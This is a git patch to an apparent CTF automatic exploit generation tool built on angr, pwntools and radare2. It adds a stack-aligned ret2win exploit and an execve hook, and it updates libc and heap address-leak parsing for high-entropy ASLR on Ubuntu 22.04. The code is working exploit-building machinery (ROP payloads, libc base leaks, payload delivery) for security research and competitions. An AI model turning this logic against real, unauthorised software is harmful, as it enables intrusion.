From c95c3c82f80fff989213ddb906dfd803935778a0 Mon Sep 17 00:00:00 2001 From: GhostFrankWu Date: Sun, 20 Oct 2024 17:10:39 -0700 Subject: [PATCH] feat: upgrade to Ubuntu 22 and adapt configurations accordingly feat(Dockerfile): upgrade to Ubuntu 22 fix(main, io): fix a rare state bug when restarting misc(challenge, hook): use system hook to hook execve feat(ret2win): add align version of ret2win misc(hook): support higher version of angr feat(leak): support high entropy ASLR misc(utils): support higher version of angr --- Dockerfile | 7 ++++--- aeg_module/aeg_main.py | 18 +++++++++------- aeg_module/binary_interactive.py | 7 ++++--- aeg_module/challenge.py | 2 ++ aeg_module/mod_exploit.py | 22 ++++++++++++------- aeg_module/mod_leak.py | 36 +++++++++++++++++--------------- aeg_module/mod_sim_procedure.py | 10 ++++----- aeg_module/mod_technique.py | 18 +++++++--------- aeg_module/utils.py | 13 ++++++++---- 9 files changed, 75 insertions(+), 58 deletions(-) diff --git a/Dockerfile b/Dockerfile index 1c2e883..7e6ee8d 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,9 +1,9 @@ -FROM ubuntu:20.04 +FROM ubuntu:22.04 ENV DEBIAN_FRONTEND=noninteractive RUN #sed -i "s/archive.ubuntu.com/mirrors.aliyun.com/g" /etc/apt/sources.list -RUN apt update && apt install -y python3 python3-pip radare2 python-capstone git ruby-full \ - curl libstdc++6 lib32stdc++6 gcc-multilib +RUN apt update && apt install -y python3 python3-pip git ruby-full curl \ + libstdc++6 lib32stdc++6 gcc-multilib RUN pip3 install pwntools angr angrop r2pipe flask # -i https://pypi.tuna.tsinghua.edu.cn/simple RUN cd tmp && git clone https://github.com/JonathanSalwan/ROPgadget.git && cd ROPgadget && \ git checkout e38c9d7be9bc68cb637f75ac0f9f4d6f41662025 && python3 setup.py install @@ -11,6 +11,7 @@ RUN gem install one_gadget RUN curl -Ls https://github.com/radareorg/radare2/releases/download/5.9.0/radare2-5.9.0.tar.xz | tar xJv && \ radare2-5.9.0/sys/install.sh # r2 in apt not correctly process flirt + RUN mkdir /aeg COPY aeg_module /aeg/aeg_module COPY ./assets/ /aeg/assets diff --git a/aeg_module/aeg_main.py b/aeg_module/aeg_main.py index bb1e8ea..468b276 100644 --- a/aeg_module/aeg_main.py +++ b/aeg_module/aeg_main.py @@ -14,7 +14,6 @@ from .engine import SmallEngine from .binary_interactive import InteractiveBinary - INFINITE_ACTIVE = -1 @@ -79,6 +78,7 @@ def exploit(self): entry = int(str(project.entry)) if challenge.target_property['static']: hook_libc_start_main(project, entry, ReplaceLibcStartMain()) + # hook_libc_start_main(project, entry, ReplaceLibcStartMain()) states = [project.factory.entry_state(add_options=extras)] for state in states: @@ -96,18 +96,23 @@ def exploit(self): for active in simulation_mgr.active: active.globals['binary'] = self.interactive_binary.__copy__() active.globals['challenge'] = self.challenge - active.libc.max_strtol_len = 17 # 20 # old is len(str(2**31)) + 1 = 11 + active.libc.max_strtol_len = 17 # 20 # old is len(str(2**31)) + 1 = 11 active.libc.buf_symbolic_bytes = 0x100 # default is 60, for log inputs like scanf log.info("Start finding unconstrained state") self.sim_explore(simulation_mgr, project, challenge, 1, start_time, 1) log.failure("Bad luck...\nBye~") def sim_explore(self, sim_mgr, project, challenge, branch_depth, start_time, explore_depth): - while sim_mgr.active and time.time() - start_time < self.timeout: + while (sim_mgr.active or sim_mgr._stashes.get('deferred')) and time.time() - start_time < self.timeout: if self.max_active_size != 1 and self.max_active_size != INFINITE_ACTIVE: - active_len = len(sim_mgr.active) sim_mgr.move(from_stash='active', to_stash='deferred', - filter_func=lambda x: sim_mgr.active.index(x) < active_len - self.max_active_size) + filter_func=lambda x: sim_mgr.active.index(x) < len(sim_mgr.active) - self.max_active_size) + if not sim_mgr.active and sim_mgr._stashes.get('deferred'): + sim_mgr.move(from_stash='deferred', to_stash='active', + filter_func=None if self.max_active_size != INFINITE_ACTIVE + else lambda x: sim_mgr.deferred.index(x) < self.max_active_size) + # if sim_mgr._stashes.get('deferred'): + # sim_mgr._clear_states('deferred') if self.debug: context.log_level = 'debug' try: @@ -136,8 +141,6 @@ def sim_explore(self, sim_mgr, project, challenge, branch_depth, start_time, exp if self.debug: if sim_mgr.errored: sim_mgr.errored[0].reraise() - # sim_mgr.move(from_stash='deferred', to_stash='active', - # filter_func=lambda x: sim_mgr.deferred.index(x) < self.max_active_size) else: log.warning("Timeout, killed") return explore_depth @@ -235,6 +238,7 @@ def unconstrained_explorer(self, state, project: angr.Project, challenge: Challe binary.close() binary = binary_before.__copy__() binary.close() + binary.connect(state) restart = False progress = False log.info(f"Step with known segments: {binary.io_seg_addr}") diff --git a/aeg_module/binary_interactive.py b/aeg_module/binary_interactive.py index 90b4a07..333154e 100644 --- a/aeg_module/binary_interactive.py +++ b/aeg_module/binary_interactive.py @@ -101,7 +101,8 @@ def warped_io(self, state, data_to_send=None, check_alive=True, has_newline=True else: self.current_process.send(data_to_send) else: - if b'{' in flag and b'}' in flag: + # Important: Change the format of flag if necessary + if b'flag{' in flag and b'}' in flag: log.success(f"Win! Received: {flag}") log.success(f"Reporting flag as: {re.findall(b'flag{.*}', flag)[0]}") if self.interactive: @@ -143,6 +144,6 @@ def get_flag(self, state, payload, has_newline=True): self.close() log.failure("Failed for this try") - def send_payload(self, state, payload): + def send_payload(self, state, payload, check_alive=True): payload = strip_zero_in_payload(payload) - return self.warped_io(state, payload) + return self.warped_io(state, payload, check_alive) diff --git a/aeg_module/challenge.py b/aeg_module/challenge.py index f45eb58..9ce5b64 100644 --- a/aeg_module/challenge.py +++ b/aeg_module/challenge.py @@ -54,6 +54,7 @@ def _init_hook_table(self): '__cxa_allocate_exception': ReplaceCxaAllocateException(), # 'atol': ReplaceAtol(self), 'system': ReplaceSystem(), + 'execve': ReplaceSystem(), }) def _init_func(self): @@ -171,6 +172,7 @@ def r2_op(self, op_): self.r2_ana_op.append(op_) log.info(f"Use {op_} to analyze binary") self.r2_pipe.cmd(op_) + log.info(f"Analyze done") def get_segment_address_copy(self): return copy.deepcopy(self.segment_address) diff --git a/aeg_module/mod_exploit.py b/aeg_module/mod_exploit.py index 0ee9521..05b7de2 100644 --- a/aeg_module/mod_exploit.py +++ b/aeg_module/mod_exploit.py @@ -1,8 +1,4 @@ -import logging -from subprocess import Popen - from angr import SimUnsatError -from pwn import p32, p64 from .challenge import Challenge from .binary_interactive import InteractiveBinary from .utils import * @@ -26,8 +22,8 @@ def run(self, state_raw: angr.SimState, challenge: Challenge, new_mem: list): self.exploit_func(state_raw, challenge, new_mem, state_raw.globals['binary']) except SimUnsatError: log.failure(f"payload constraint unset") - except AttributeError: - log.failure(f"payload gadget unset") + # except AttributeError: + # log.failure(f"payload gadget unset") self.available = False log.failure(f"Exploit {self.exploit_name} failed") @@ -46,6 +42,7 @@ def init_exploits(): log.info('Loading exploits.') return [ Exploit('ret2win', ret2win, ['Canary'], ['text', 'win_func'], 1), + Exploit('ret2win_align', ret2win_align, ['Canary'], ['text', 'win_func'], 1), Exploit('ret2backdoor', ret2backdoor, ['Canary'], ['text', 'backdoor', 'cmd_str'], 3), Exploit('ret2libc_align', ret2libc_align, ['Canary'], ['libc', 'dynamic'], 4), @@ -134,18 +131,27 @@ def jmp2shellcode(state_raw: angr.SimState, challenge: Challenge, new_mem: list, binary.get_flag(state_raw, dump_payload(state_raw, True)) -def ret2win(state_raw: angr.SimState, challenge: Challenge, new_mem: list, binary: InteractiveBinary): +def ret2win(state_raw: angr.SimState, challenge: Challenge, new_mem: list, binary: InteractiveBinary, align_=False): for win_addr in binary.io_seg_addr.get('win_func'): log.info(f"Trying ret2win at {hex(win_addr)}") win_addr += binary.io_seg_addr['text'] state = state_raw.copy() arch_bytes = challenge.target_property['arch_bytes'] - constraint = state.memory.load(new_mem[0], size=arch_bytes) == (challenge.le(win_addr)) + payload = challenge.le(win_addr) + if align_: + payload = challenge.le(challenge.rop.find_gadget(['ret']).address) + payload + constraint = state.memory.load(new_mem[0], size=len(payload)) == payload + # _bin = state.globals['binary'] + # constraint2 = state.memory.load(_bin.new_stack_symbol, size=arch_bytes) == challenge.le(_bin.new_stack_addr) if state.solver.satisfiable(extra_constraints=[constraint]): state.add_constraints(constraint) binary.get_flag(state_raw, dump_payload(state, False)) +def ret2win_align(state: angr.SimState, challenge: Challenge, new_mem: list, binary: InteractiveBinary): + ret2win(state, challenge, new_mem, binary, align_=True) + + def ret2win_obo(state_raw: angr.SimState, challenge: Challenge, new_mem: list, binary: InteractiveBinary): for win_addr in binary.io_seg_addr.get('win_func'): if win_addr | 0xff == binary.rop_address | 0xff: diff --git a/aeg_module/mod_leak.py b/aeg_module/mod_leak.py index 8088b4a..223e4c4 100644 --- a/aeg_module/mod_leak.py +++ b/aeg_module/mod_leak.py @@ -78,7 +78,7 @@ def run(self, state: angr.SimState, __, ___): rec += binary.warped_io(state) if self.pattern in rec: base = binary.rle(rec.split(self.pattern)[1][:6 if ab == 8 else 4].ljust(ab, b'\x00')) - if base >> 40 == 0x7f: + if base >> 44 == 0x7: base -= 243 # can be done automatically log.info(f"__libc_start_main is leaked as {hex(base)}") libc = ELF(binary.libc, checksec=False) @@ -155,22 +155,24 @@ def _leak_got(state_raw: angr.SimState, challenge, new_mem: list, align_=False): payload = dump_payload(state, True) _ = binary.send_payload(state, payload) try: - if arch_bytes == 8: - rec = binary.warped_io(state) - rec = rec[:rec.index(b'\x7f') + 1] - leak_addr = u64(rec[-6:].ljust(8, b'\x00')) - else: - rec = binary.warped_io(state) - rec = rec[:rec.index(b'\xf7') + 1] - leak_addr = u32(rec[-4:]) - log.success(f"Leak libc func address: {hex(leak_addr)}") - libc_base = leak_addr - ELF(binary.libc, checksec=False).sym[use_function] - log.success(f"Got libc base address: {hex(libc_base)}") - binary.io_seg_addr['libc'] = libc_base - tail = binary.warped_io(state, check_alive=False) - if tail: - log.info(f"Have tail: {tail}") - return binary + rec = binary.warped_io(state) + function_base = ELF(binary.libc, checksec=False).sym[use_function] + for offset in range(0, len(rec) - 4): + if arch_bytes == 8: # assume there at least one none-printable char + if all([31 < i < 127 for i in rec[offset:offset + 6]]): + continue + leak_addr = u64(rec[offset:offset + 6].ljust(8, b'\x00')) + else: + leak_addr = u32(rec[offset:offset + 4]) + if (leak_addr ^ function_base) & 0xfff == 0 and leak_addr > (0xe << 28 if arch_bytes < 8 else 7 << 44): + log.success(f"Leak libc func address: {hex(leak_addr)}") + libc_base = leak_addr - function_base + log.success(f"Got libc base address: {hex(libc_base)}") + binary.io_seg_addr['libc'] = libc_base + tail = binary.warped_io(state, check_alive=False) + if tail: + log.info(f"Have tail: {tail}") + return binary except ValueError: log.failure(f"Failed to get leak address.") except PwnlibException: diff --git a/aeg_module/mod_sim_procedure.py b/aeg_module/mod_sim_procedure.py index 2825627..28edde4 100644 --- a/aeg_module/mod_sim_procedure.py +++ b/aeg_module/mod_sim_procedure.py @@ -1,7 +1,7 @@ import angr.procedures.libc.printf -import angr.procedures.libc.scanf import angr.procedures.libc.puts from angr import SimUnsatError +from claripy import If from .utils import * from .mod_leak import MitigateCanaryPuts, MitigatePIEPuts @@ -9,11 +9,10 @@ class ReplaceGets(angr.SimProcedure): """ - angr default gets hook can find unconstrained state in the same block. + angr default gets hook can only find unconstrained state in the same block. We need to write a hook to provide longer symbolic input. for add \n or not, we may return multi successors """ - IS_FUNCTION = True def __init__(self, challenge): super().__init__() @@ -26,8 +25,8 @@ def run(self, dst): stdin = new_state.posix.get_fd(0) data_read, data_size = stdin.read_data(0x200) for i, byte in enumerate(data_read.chop(8)): - new_state.solver.add(new_state.solver.If(i + 1 != data_size, byte != b'\n', byte == b'\n')) - # new_state.solver.Or(i + 2 == 0x1000, stdin.eof(), byte == b'\n'))) + new_state.solver.add(If(i + 1 != data_size, byte != b'\n', byte == b'\n')) + # Or(i + 2 == 0x1000, stdin.eof(), byte == b'\n') new_state.memory.store(dst + data_size, b'\0') stdin = self.state.posix.get_fd(0) @@ -170,7 +169,6 @@ def run(self, err_no): class ReplaceSystem(angr.SimProcedure): def run(self, cmd): # get_max_str_len may be slow - log.info("Enter system hook...") var_loc = self.state.solver.eval(cmd) print(hex(var_loc)) symbolic_list = [self.state.memory.load(var_loc + x, 1).symbolic diff --git a/aeg_module/mod_technique.py b/aeg_module/mod_technique.py index 8bd8f00..cc6ec41 100644 --- a/aeg_module/mod_technique.py +++ b/aeg_module/mod_technique.py @@ -1,6 +1,3 @@ -import time - -import angr from angr import SimEngineError, SimUnsatError, ExplorationTechnique from .utils import * @@ -71,10 +68,11 @@ def do_addr_leak(state, stdin, stdout, binary): if ARCH_64_MMAP_PRE_HEX in stdout: leak_libc_raw = binary.warped_io(state, stdin, has_newline=False) for _ in range(5): - if leak_libc_raw and b'0x7f' in leak_libc_raw: - real_leak_text = b'7f' + leak_libc_raw.split(b'0x7f')[1][:10] + if leak_libc_raw and b'0x7' in leak_libc_raw: + real_leak_text = b'7' + leak_libc_raw.split(b'0x7')[1][:11] log.success(f"Leak libc address as: {real_leak_text}") libc_base = int(real_leak_text, 16) + 0x201000 - 0x10 + libc_base = libc_base + 0x1ff000 # mmap behavior is different on newer ASLR log.success(f"Got libc base: {hex(libc_base)}") binary.io_seg_addr['libc'] = libc_base return 'libc' @@ -89,13 +87,13 @@ def do_addr_leak(state, stdin, stdout, binary): if chunk: leak_heap_raw = binary.warped_io(state, stdin, has_newline=False) for _ in range(5): - if b'0x5' in leak_heap_raw: + if leak_heap_raw and b'0x5' in leak_heap_raw: real_leak = int(b'5' + leak_heap_raw.split(b'0x5')[1][:11], 16) - elif b'0x7f' in leak_heap_raw: - real_leak = int(b'7f' + leak_heap_raw.split(b'0x7f')[1][:10], 16) + elif leak_heap_raw and b'0x7' in leak_heap_raw: + real_leak = int(b'7' + leak_heap_raw.split(b'0x7')[1][:11], 16) else: time.sleep(0.3) - leak_heap_raw += binary.warped_io(state) + leak_heap_raw = binary.warped_io(state) continue log.success(f"Leak chunk address as: {hex(real_leak)}") binary.io_seg_addr['heap'] = True @@ -139,7 +137,7 @@ def do_addr_leak(state, stdin, stdout, binary): log.success(f"Got text segment base: {hex(text_base)}") binary.io_seg_addr['text'] = text_base return 'text' - elif real_leak_text >> 40 == 0x7f: # leaked addr is from libc + elif real_leak_text >> 44 == 0x7: # leaked addr is from libc log.success(f"Leak libc address: {hex(real_leak_text)}") real_leak_text -= offset - 0x100000 # angr add 0x100000 to libc base log.success(f"Real leaked libc address: {hex(real_leak_text)}") diff --git a/aeg_module/utils.py b/aeg_module/utils.py index 833da9c..3a0edec 100644 --- a/aeg_module/utils.py +++ b/aeg_module/utils.py @@ -1,6 +1,7 @@ from subprocess import Popen import angr +import claripy from pwn import * import json from pwnlib.elf.elf import Function @@ -61,6 +62,7 @@ def get_win_functions(challenge): else: challenge.r2_op('aa') challenge.r2_op('aac') + challenge.r2_op('aaaa') functions = [func for func in r2.cmdj('aflj')] string_used_addr = {} strings = [string_ for string_ in r2.cmdj('izj')] @@ -69,6 +71,7 @@ def get_win_functions(challenge): if any([x[:-1] in value for x in known_flag_names]): address = string_['vaddr'] refs = [func for func in json.loads(r2.cmd('axtj @ {}'.format(address)))] + print(value, [hex(ref['from']) for ref in refs]) for ref in refs: if 'fcn_name' in ref: string_used_addr[ref['fcn_name']] = ref['from'] @@ -100,11 +103,11 @@ def get_win_functions(challenge): return win_addr -def greedy_backward_search(challenge, target_addr, start_addr=None, max_depth=32): +def greedy_backward_search(challenge, target_addr, start_addr=None, max_depth=8): if max_depth == 0: return [] r2 = challenge.get_r2() - challenge.r2_op('aaaaa') + challenge.r2_op('aaaa') if start_addr is None: start_addr = r2.cmdj('iej')[0]['vaddr'] if start_addr != target_addr: @@ -119,6 +122,8 @@ def greedy_backward_search(challenge, target_addr, start_addr=None, max_depth=32 if target_bb_addr is None: return [target_addr] xrefs = r2.cmdj(f'axtj @ {target_bb_addr}') + xrefs = [i for i in xrefs if i['type'] == 'CALL' or str(i.get("opcode")).startswith('j') + or str(i.get("flag")).startswith('entry')] target_bb_addr -= 1 # todo: better way to find the start address for i in xrefs: r = greedy_backward_search(challenge, i['from'], start_addr, max_depth - 1) @@ -283,8 +288,8 @@ def strip_zero_in_payload(payload, is_raw=False): def reorder_successors(sim: angr.SimProcedure, successors: list): ret = sim.state.stack_pop() sim.state.stack_push(ret) - for i in range(len(successors)): - sim.successors.add_successor(successors[i], ret, sim.state.solver.true, 'Ijk_NoHook') + for i in range(len(successors)): # https://github.com/angr/angr-doc/blob/master/docs/paths.md + sim.successors.add_successor(successors[i], ret, claripy.true(), 'Ijk_Ret') def get_chunk_by_addr(binary, addr):